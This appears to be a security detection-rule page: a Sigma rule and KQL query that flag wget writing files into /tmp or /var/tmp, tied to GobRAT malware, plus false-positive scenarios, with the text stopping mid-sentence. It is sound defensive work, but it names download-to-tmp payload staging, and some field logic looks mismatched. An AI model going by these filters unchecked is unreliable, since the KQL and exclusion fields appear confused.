Adversaries may use wget to exfiltrate data or deploy payloads by creating files in temporary directories. SOC teams should proactively hunt for this behavior as it indicates potential command and control communication or initial compromise via fileless execution.
Detection Rule
title: Wget Creating Files in Tmp Directory
id: 35a05c60-9012-49b6-a11f-6bab741c9f74
status: test
description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
product: linux
category: file_event
detection:
selection:
Image|endswith: '/wget'
TargetFilename|startswith:
- '/tmp/'
- '/var/tmp/'
condition: selection
falsepositives:
- Legitimate downloads of files in the tmp folder.
level: medium
imFileEvent
| where TargetFilePath endswith "/wget" and (TargetFileName startswith "/tmp/" or TargetFileName startswith "/var/tmp/")Scenario: System Update via wget
Description: A system administrator uses wget to download a system update package to a temporary directory as part of a routine maintenance task.
Filter/Exclusion: Check for known update URLs or use a filter like process.name = "wget" AND file.path != "http://update.example.com/*"
Scenario: Scheduled Job for Data Import
Description: A scheduled job runs wget to import data from an internal API endpoint into a temporary directory for processing.
Filter/Exclusion: Exclude processes associated with the job scheduler (e.g., cron, systemd, or task scheduler) or filter by file.path containing a known internal API URL.
Scenario: Temporary File Creation for Debugging
Description: A developer uses wget to fetch a debug file or log snippet into a temporary directory for troubleshooting.
Filter/Exclusion: Filter by user context (e.g., user.name = "dev_user") or check for file extensions like .log or .txt in the file.path.
Scenario: Backup Tool Using wget
Description: A backup tool or script uses wget to download backup archives to a temporary directory before moving them to a long-term storage location.
Filter/Exclusion: Check for known backup tools (e.g., rsync, borgbackup) or use a filter like process.parent.name = "backup_tool".
Scenario: Internal Monitoring Tool Fetching Metrics
Description: An internal monitoring tool uses wget to fetch metrics from a local HTTP endpoint into a temporary directory for analysis.
Filter/Exclusion: Filter by IP address (e.g., src_ip = 10.0.0.10) or check for known internal endpoints in the `file